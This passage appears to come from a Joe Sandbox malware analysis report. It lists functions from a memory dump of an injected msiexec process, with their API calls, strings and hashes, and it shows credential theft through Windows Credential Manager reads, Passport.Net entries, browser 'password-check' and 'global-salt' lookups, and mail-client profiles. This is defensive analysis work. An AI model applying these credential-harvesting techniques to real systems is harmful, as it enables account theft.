                                                                                                    • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                    Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                    • memset.MSVCRT ref: 00410246
                                                                                                    • memset.MSVCRT ref: 00410258
                                                                                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                    • memset.MSVCRT ref: 0041033F
                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                    • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 3974772901-0
                                                                                                    • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                    • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                    Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0044406C
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                    • strlen.MSVCRT ref: 004440D1
                                                                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 577244452-0
                                                                                                    • Opcode ID: 8e08044a2a4bc7e366d4504355b0cb20ffc498d5a3fe89b8b06fb4494e18d7f8
                                                                                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                    • Opcode Fuzzy Hash: 8e08044a2a4bc7e366d4504355b0cb20ffc498d5a3fe89b8b06fb4494e18d7f8
                                                                                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                    Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                                                    • _strcmpi.MSVCRT ref: 00404536
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                    • String ID: imap$pop3$smtp
                                                                                                    • API String ID: 2025310588-821077329
                                                                                                    • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                    • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                    Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C02D
                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76230A60), ref: 00408EBE
                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408E31
                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                    • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                    • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                    Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                      • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                    • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                    • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                    • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$memcpy
                                                                                                    • String ID: global-salt$password-check
                                                                                                    • API String ID: 231171946-3927197501
                                                                                                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                    Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                    • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                    Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                    • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                    • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                    • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                    • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 19018683-0
                                                                                                    • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                    • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                    • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                    • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                    Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040644F
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                      • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 438689982-0
                                                                                                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                    Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                      • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                    • strlen.MSVCRT ref: 0040F7BE
                                                                                                    • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                    • String ID: Passport.Net\*
                                                                                                    • API String ID: 2329438634-3671122194
                                                                                                    • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                    • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                    • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                    • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                    Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                    • memset.MSVCRT ref: 0040330B
                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                    • strchr.MSVCRT ref: 0040335A
                                                                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                    • strlen.MSVCRT ref: 0040339C
                                                                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                    • String ID: Personalities
                                                                                                    • API String ID: 2103853322-4287407858
                                                                                                    • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                    • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                    Function 0043D62C Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 224COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: H
                                                                                                    • API String ID: 2221118986-2852464175
                                                                                                    • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                    • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                    • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                    • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                    Function 0042563B Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 176COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                    • API String ID: 3510742995-3170954634
                                                                                                    • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                    • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                    • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                    • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                    Function 00414625 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 132COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: winWrite1$winWrite2
                                                                                                    • API String ID: 438689982-3457389245
                                                                                                    • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                    • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                    • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                    • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                    Function 004144FD Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 109COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: winRead
                                                                                                    • API String ID: 1297977491-2759563040
                                                                                                    • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                    • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                    • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                    • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                    Function 00449550 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0044955B
                                                                                                    • memset.MSVCRT ref: 0044956B
                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                    • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
